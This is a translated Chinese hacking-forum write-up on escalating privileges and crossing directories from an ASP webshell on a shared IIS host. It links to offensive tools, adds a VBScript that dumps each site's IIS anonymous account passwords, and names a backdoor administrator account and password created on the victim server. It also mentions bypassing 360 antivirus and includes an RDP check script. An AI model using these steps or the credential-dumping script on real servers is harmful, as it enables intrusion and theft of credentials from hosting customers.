Side-note (旁注): cross-directory privilege escalation on an IIS shared host from a webshell

Disclaimer: This article is original content of the Coisini community and may not be reproduced without permission. https://blog.csdn.net/kclax/article/details/91498323


The most common setup among domestic Chinese IDC operators is IIS parsing ASP: Waixing (外星), Xinnet (新网), West.cn (西部数码), HZHost (华众) and so on.
Privilege escalation on these shared hosts is very hard. I recently ran into one during one of the Xike (习科) core study group's penetration tests, so I will talk about it here.

I) Prelude
Side-note: the target sits on a shared virtual-host server that only parses ASP; ASPX and PHP are not supported.
Fortunately the host forgot to disable WScript (Windows Script Host),
but the server had the rogue software and the antivirus 360 installed. Although I do not understand why rogue software and antivirus software would coexist, I am quite clear that it makes escalation harder.

II) Privilege escalation
Since this is a side-note attack, the job is to find a way across directories. But which directory do we cross into?
On IIS this is actually easy: an ASPX "big horse" (full-featured webshell) usually has it built in, but with ASP you need to execute commands. See the Xike (习科) arsenal:

http://attach.blackbap.org/down/wzaq/iis.vbs

This script reads the IIS web accounts and their passwords. Upload cmd.exe, cscript.exe and iis.vbs to a directory that is both writable and allows execution (usually C:\Windows\Temp)
and then run:

cscript iis.vbs

This returns each site's IIS account, password and path.
On some shared hosts a single server carries thousands of ASP sites, so the request easily times out;
in that case change it to:

cscript iis.vbs > iis.txt

This keeps the web request from timing out; read iis.txt afterwards.
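To show what a script like this actually does, here is an added example written for this page. It is not the iis.vbs from the arsenal link; it enumerates IIS 6 sites through the ADSI metabase provider and records each site's ID, description, home directory and anonymous account, writing straight to a file instead of stdout so that a long site list does not stall the web request that launched it. Assumptions: IIS 6 (metabase-based), Windows Script Host available, and C:\Windows\Temp writable.

```vbscript
' Added example for this page, not the iis.vbs from the arsenal.
' Enumerates IIS 6 web sites through the ADSI metabase provider and writes,
' per site, the site ID, description, home directory and anonymous account.
' Assumptions: IIS 6 metabase, WSH/cscript available, C:\Windows\Temp writable.
' Run as:  cscript //nologo enum_iis.vbs
Option Explicit

Const OUTPUT_PATH = "C:\Windows\Temp\iis.txt"   ' assumption: writable path

Dim fso, outFile, w3svc, site, root, count
Set fso = CreateObject("Scripting.FileSystemObject")
' Write directly to a file rather than stdout: on a host with thousands of
' sites the web request that launched the script would time out first.
Set outFile = fso.CreateTextFile(OUTPUT_PATH, True)

Set w3svc = GetObject("IIS://localhost/W3SVC")
count = 0
For Each site In w3svc
    ' W3SVC also contains filters and info nodes; only site nodes matter.
    If site.Class = "IIsWebServer" Then
        On Error Resume Next
        ' The ROOT virtual directory carries the home path and the anonymous
        ' account. AnonymousUserPass is a secure metabase property, so the
        ' read only succeeds for an account permitted to see it.
        Set root = GetObject("IIS://localhost/W3SVC/" & site.Name & "/ROOT")
        If Err.Number = 0 Then
            outFile.WriteLine "Site " & site.Name & ": " & site.ServerComment
            outFile.WriteLine "  Path: " & root.Path
            outFile.WriteLine "  User: " & root.AnonymousUserName
            outFile.WriteLine "  Pass: " & root.AnonymousUserPass
            count = count + 1
        Else
            outFile.WriteLine "Site " & site.Name & ": error " & Err.Description
            Err.Clear
        End If
        On Error GoTo 0
    End If
Next

outFile.Close
WScript.Echo "Wrote " & count & " site(s) to " & OUTPUT_PATH
```

The per-site On Error Resume Next matters on a large host: one site with a broken metabase entry or a password the caller is not allowed to read should produce one error line, not abort the whole enumeration.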

Privilege escalation really took a lot of effort: I went through every overflow exploit without success, and every "magic tool", but could not find Serv-U or similar software.
In the end it still succeeded, and we added an administrators account cond0r with the password 123!@#asdASD.
An IIS overflow gave SYSTEM, and the shell.user component was used to add the user, bypassing 360.

III) Cross-directory
If everything went this smoothly, this post would be pointless.
There were several problems. First, the Remote Desktop service was enabled and reading the registry gave the default port 3389, but scanning local port 3389 from the webshell showed it closed, and an nmap scan did not detect a Remote Desktop port either.
Second, the netstat command was blocked; uploading my own netstat.exe gave no output, and the same was true of net.exe.
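Before concluding from a closed port that Remote Desktop is unreachable, it is worth reconciling the registry values with the service state, since PortNumber alone says nothing about whether the listener is actually opened. The following is an added example for this page, not something from the original post; it assumes Windows Script Host is available and the account can read HKLM and query WMI.

```vbscript
' Added example for this page (not from the original post): reconcile what the
' registry and the service say about Remote Desktop before trusting a port scan.
' Assumes WSH is available and the account can read HKLM and query WMI.
' Run as:  cscript //nologo rdp_check.vbs
Option Explicit

Const TS_KEY = "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\"

Dim sh, wmi, svc, port, deny
Set sh = CreateObject("WScript.Shell")

On Error Resume Next
' Listening port of the RDP-Tcp listener; 3389 unless an admin changed it.
port = sh.RegRead(TS_KEY & "WinStations\RDP-Tcp\PortNumber")
If Err.Number <> 0 Then
    port = "(unreadable)"
    Err.Clear
End If
' 1 = connections denied; the listener is not opened even if the service runs.
deny = sh.RegRead(TS_KEY & "fDenyTSConnections")
If Err.Number <> 0 Then
    deny = "(unreadable)"
    Err.Clear
End If
On Error GoTo 0

WScript.Echo "RDP-Tcp PortNumber:  " & port
WScript.Echo "fDenyTSConnections:  " & deny

' Service state from WMI: a stopped or disabled TermService also explains a
' closed port despite PortNumber = 3389.
Set wmi = GetObject("winmgmts:\\.\root\cimv2")
For Each svc In wmi.ExecQuery("SELECT Name, State, StartMode FROM Win32_Service WHERE Name = 'TermService'")
    WScript.Echo "TermService:         " & svc.State & " (start mode " & svc.StartMode & ")"
Next

If deny = 1 Then
    WScript.Echo "Verdict: RDP disabled by policy; port " & port & " will not be listening."
ElseIf port <> "(unreadable)" And port <> 3389 Then
    WScript.Echo "Verdict: RDP moved off 3389; scan port " & port & " instead."
Else
    WScript.Echo "Verdict: registry expects 3389; if it is closed, check the service state and any host firewall."
End If
```

The three readings are deliberately kept separate in the output: a non-default PortNumber, fDenyTSConnections = 1 and a stopped TermService each produce a closed 3389 from the outside, but call for different next steps.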

So even with a successful escalation there was no way to log in to the server. Well, don't we have the IIS passwords?
Also from the Xike arsenal, under the website security category:

http://attach.blackbap.org/down/wzaq/bs.rar

Upload this tool to the IIS shared host and run it. On the first, default screen click "OK",
and the following verification box pops up:
Here you can enter the user name and password of the target site's IIS account (IUSER_00744% MjI1NDkyMDA5MTAyNjE), but this approach is usually not very effective.
It was no exception here and failed, so I simply used the administrators account: the cond0r account and password created above.
This way we get to browse directories with administrator permissions,
and of course with that permission it is also very easy to take the target site.
The posts I write generally do not describe how some method took down some particular site. This was a formally authorized penetration test by the study group, and a part of it can be pulled out as a typical case, but it is also a case that cannot be copied elsewhere. So what I talk about is the line of thinking: having your own ideas gives you a soul, and walking your own path is what makes a real hacker.

link:http://bbs.blackbap.org/thread-3868-1-1.html

Comments: The highlight of this article is the cross-directory access after privilege escalation. Many people want to escalate after getting a shell, and when they run into all sorts of obstacles they can read this article; it gives a good line of thinking.
